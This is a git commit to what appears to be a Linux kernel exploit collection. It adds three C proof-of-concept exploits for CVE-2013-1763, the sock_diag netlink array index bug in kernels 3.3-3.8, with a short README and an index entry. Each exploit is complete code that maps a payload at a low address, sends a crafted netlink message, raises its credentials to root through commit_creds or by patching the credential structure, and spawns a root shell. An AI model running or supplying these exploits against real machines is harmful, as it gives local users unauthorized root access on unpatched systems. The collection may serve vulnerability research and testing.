linux-exp

Gitmaninc · Gitmaninc · commit bfd62a46ae63 · 2017-06-15T01:30:13.000-04:00
diff --git a/2013/CVE-2013-1763/24555.c b/2013/CVE-2013-1763/24555.c
@@ -0,0 +1,60 @@
+// archer.c
+//
+// 2012 sd@fucksheep.org
+//
+// Works reliably against x86-64 3.3-3.7 arch.
+//
+// Tested against:
+//
+// Linux XXX 3.3.1-1-ARCH #1 SMP PREEMPT Tue Apr 3 06:46:17 UTC 2012 x86_64 GNU/Linux
+// Linux XXX 3.4.7-1-ARCH #1 SMP PREEMPT Sun Jul 29 22:02:56 CEST 2012 x86_64 GNU/Linux
+// Linux XXX 3.7.4-1-ARCH #1 SMP PREEMPT Mon Jan 21 23:05:29 CET 2013 x86_64 GNU/Linux
+// ...
+
+#include <assert.h>
+
+#define JUMP  0x0000100000001000LL
+#define BASE  0x380000000
+#define SIZE  0x010000000
+#define KSIZE  0x2000000
+
+static long ugid;
+
+void patch_current() {
+        int i,j,k;
+        char *current = *(char**)(((long)&i) & (-8192));
+        long kbase = ((long)current)>>36;
+
+        for (i=0; i<4000; i+=4) {
+                long *p = (void *)&current[i];
+                int *t = (void*) p[0];
+                if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
+                for (j=0; j<20; j++) {
+      for (k = 0; k < 8; k++)
+                          if (((int*)&ugid)[k%2] != t[j+k]) goto next;
+                        for (i = 0; i < 8; i++) t[j+i] = 0;
+                        for (i = 0; i < 10; i++) t[j+9+i] = -1;
+                        return;
+next:;          }
+        }
+}
+
+
+int main()
+{
+  long u = getuid();
+  long g = getgid();
+  int i, f = socket(16,3,4);
+  static int n[10] = {40,0x10014,0,0,45,-1};
+
+  assert(mmap((void*)(1<<12), 1<<20, 3, 0x32, 0, 0)!=-1);
+
+  setresuid(u,u,u); setresgid(g,g,g);
+  ugid = (g<<32)|u;
+
+  memcpy(1<<12, &patch_current, 1024);
+  for (i = 0; i < (1<<17); i++) ((void**)(1<<12))[i] = &patch_current;
+  send(f, n, sizeof(n), 0);
+  setuid(0);
+  return execl("/bin/bash", "-sh", 0);
+}
diff --git a/2013/CVE-2013-1763/24746.c b/2013/CVE-2013-1763/24746.c
@@ -0,0 +1,75 @@
+#include <unistd.h>
+#include <sys/socket.h>
+#include <linux/netlink.h>
+#include <netinet/tcp.h>
+#include <errno.h>
+#include <linux/if.h>
+#include <linux/filter.h>
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <linux/sock_diag.h>
+#include <linux/inet_diag.h>
+#include <linux/unix_diag.h>
+#include <sys/mman.h>
+
+typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+_commit_creds commit_creds;
+_prepare_kernel_cred prepare_kernel_cred;
+unsigned long sock_diag_handlers, nl_table;
+
+int __attribute__((regparm(3)))
+x()
+{
+	commit_creds(prepare_kernel_cred(0));
+	return -1;
+}
+
+char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
+
+int main() {
+	int fd;
+    unsigned long mmap_start, mmap_size = 0x10000;
+	unsigned family;
+	struct {
+		struct nlmsghdr nlh;
+		struct unix_diag_req r;
+	} req;
+	char	buf[8192];
+
+	if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
+		printf("Can't create sock diag socket\n");
+		return -1;
+	}
+
+	memset(&req, 0, sizeof(req));
+	req.nlh.nlmsg_len = sizeof(req);
+	req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
+	req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
+	req.nlh.nlmsg_seq = 123456;
+
+	req.r.udiag_states = -1;
+	req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
+
+	/* Ubuntu 12.10 x86_64 */
+	req.r.sdiag_family = 0x37;
+	commit_creds = (_commit_creds) 0xffffffff8107d180;
+	prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
+    mmap_start = 0x1a000;
+
+    if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
+		MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
+
+		printf("mmap fault\n");
+		exit(1);
+    }
+
+    *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
+    memset((void *)mmap_start, 0x90, mmap_size);
+    memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));
+
+	send(fd, &req, sizeof(req), 0);
+	if(!getuid())
+		system("/bin/sh");
+}
diff --git a/2013/CVE-2013-1763/33336.c b/2013/CVE-2013-1763/33336.c
@@ -0,0 +1,164 @@
+/* 
+* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
+* bug found by Spender
+* poc by SynQ
+* 
+* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux
+* using nl_table->hash.rehash_time, index 81
+* 
+* Fedora 18 support added
+* 
+* 2/2013
+*/
+
+#include <unistd.h>
+#include <sys/socket.h>
+#include <linux/netlink.h>
+#include <netinet/tcp.h>
+#include <errno.h>
+#include <linux/if.h>
+#include <linux/filter.h>
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <linux/sock_diag.h>
+#include <linux/inet_diag.h>
+#include <linux/unix_diag.h>
+#include <sys/mman.h>
+
+typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+_commit_creds commit_creds;
+_prepare_kernel_cred prepare_kernel_cred;
+unsigned long sock_diag_handlers, nl_table;
+
+int __attribute__((regparm(3)))
+kernel_code()
+{
+	commit_creds(prepare_kernel_cred(0));
+	return -1;
+}
+
+int jump_payload_not_used(void *skb, void *nlh)
+{
+	asm volatile (
+		"mov $kernel_code, %eax\n"
+		"call *%eax\n"
+	);
+}
+
+unsigned long
+get_symbol(char *name)
+{
+	FILE *f;
+	unsigned long addr;
+	char dummy, sym[512];
+	int ret = 0;
+ 
+	f = fopen("/proc/kallsyms", "r");
+	if (!f) {
+		return 0;
+	}
+ 
+	while (ret != EOF) {
+		ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
+		if (ret == 0) {
+			fscanf(f, "%s\n", sym);
+			continue;
+		}
+		if (!strcmp(name, sym)) {
+			printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
+			fclose(f);
+			return addr;
+		}
+	}
+	fclose(f);
+ 
+	return 0;
+}
+
+int main(int argc, char*argv[])
+{
+	int fd;
+	unsigned family;
+	struct {
+		struct nlmsghdr nlh;
+		struct unix_diag_req r;
+	} req;
+	char	buf[8192];
+
+	if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
+		printf("Can't create sock diag socket\n");
+		return -1;
+	}
+
+	memset(&req, 0, sizeof(req));
+	req.nlh.nlmsg_len = sizeof(req);
+	req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
+	req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
+	req.nlh.nlmsg_seq = 123456;
+
+	//req.r.sdiag_family = 89;
+	req.r.udiag_states = -1;
+	req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
+
+	if(argc==1){
+		printf("Run: %s Fedora|Ubuntu\n",argv[0]);
+		return 0;
+	}
+	else if(strcmp(argv[1],"Fedora")==0){
+	  commit_creds = (_commit_creds) get_symbol("commit_creds");
+	  prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
+	  sock_diag_handlers = get_symbol("sock_diag_handlers");
+	  nl_table = get_symbol("nl_table");
+	  
+	  if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){
+		printf("some symbols are not available!\n");
+		exit(1);
+		}
+
+	  family = (nl_table - sock_diag_handlers) / 4;
+	  printf("family=%d\n",family);
+	  req.r.sdiag_family = family;
+	  
+	  if(family>255){
+		printf("nl_table is too far!\n");
+		exit(1);
+		}
+	}
+	else if(strcmp(argv[1],"Ubuntu")==0){
+	  commit_creds = (_commit_creds) 0xc106bc60;
+	  prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;
+	  req.r.sdiag_family = 81;
+	}
+
+	unsigned long mmap_start, mmap_size;
+	mmap_start = 0x10000;
+	mmap_size = 0x120000;
+	printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);
+
+        if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
+                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
+                printf("mmap fault\n");
+                exit(1);
+        }
+	memset((void*)mmap_start, 0x90, mmap_size);
+
+	char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm
+	unsigned long *asd = &jump[4];
+	*asd = (unsigned long)kernel_code;
+
+	memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));
+
+	if ( send(fd, &req, sizeof(req), 0) < 0) {
+		printf("bad send\n");
+		close(fd);
+		return -1;
+	}
+
+	printf("uid=%d, euid=%d\n",getuid(), geteuid() );
+
+	if(!getuid())
+		system("/bin/sh");
+
+}
diff --git a/2013/CVE-2013-1763/README.md b/2013/CVE-2013-1763/README.md
@@ -0,0 +1,23 @@
+# CVE-2013-1763
+```
+Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c 
+in the Linux kernel before 3.7.10 allows local users to gain privileges via a large family value in a Netlink message.
+```
+
+Vulnerability reference:
+ * [CVE-2013-1763](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1763)  
+ * [exp-db](https://www.exploit-db.com/exploits/33336/)  
+ * [exp-db](https://www.exploit-db.com/exploits/24746/)  
+ * [exp-db](https://www.exploit-db.com/exploits/24555/)  
+
+## Kernels
+```
+3.3-3.8
+```   
+
+
+## References
+* [Linux Kernel CVE-2013-1763 Local Privilege Escalation Vulnerability](http://www.securityfocus.com/bid/58137/exploit)  
+* [linux kernel 本地提权漏洞CVE-2013-1763 exploit 代码分析](https://my.oschina.net/fgq611/blog/181812)  
+
+
diff --git a/README.md b/README.md
@@ -48,6 +48,9 @@ linux-kernel-exploits
 - [CVE-2013-2094](./2013/CVE-2013-2094)　　[perf_swevent]  
 (3.0.0, 3.0.1, 3.0.2, 3.0.3, 3.0.4, 3.0.5, 3.0.6, 3.1.0, 3.2, 3.3, 3.4.0, 3.4.1, 3.4.2, 3.4.3, 3.4.4, 3.4.5, 3.4.6, 3.4.8, 3.4.9, 3.5, 3.6, 3.7, 3.8.0, 3.8.1, 3.8.2, 3.8.3, 3.8.4, 3.8.5, 3.8.6, 3.8.7, 3.8.8, 3.8.9)  
 
+- [CVE-2013-1763](./2013/CVE-2013-1763)　　[__sock_diag_rcv_msg]  
+(3.3-3.8)  
+
 - [CVE-2013-0268](./2013/CVE-2013-0268)　　[msr]  
 (2.6.18, 2.6.19, 2.6.20, 2.6.21, 2.6.22, 2.6.23, 2.6.24, 2.6.25, 2.6.26, 2.6.27, 2.6.27, 2.6.28, 2.6.29, 2.6.30, 2.6.31, 2.6.32, 2.6.33, 2.6.34, 2.6.35, 2.6.36, 2.6.37, 2.6.38, 2.6.39, 3.0.0, 3.0.1, 3.0.2, 3.0.3, 3.0.4, 3.0.5, 3.0.6, 3.1.0, 3.2, 3.3, 3.4, 3.5, 3.6, 3.7.0, 3.7.6)  
 
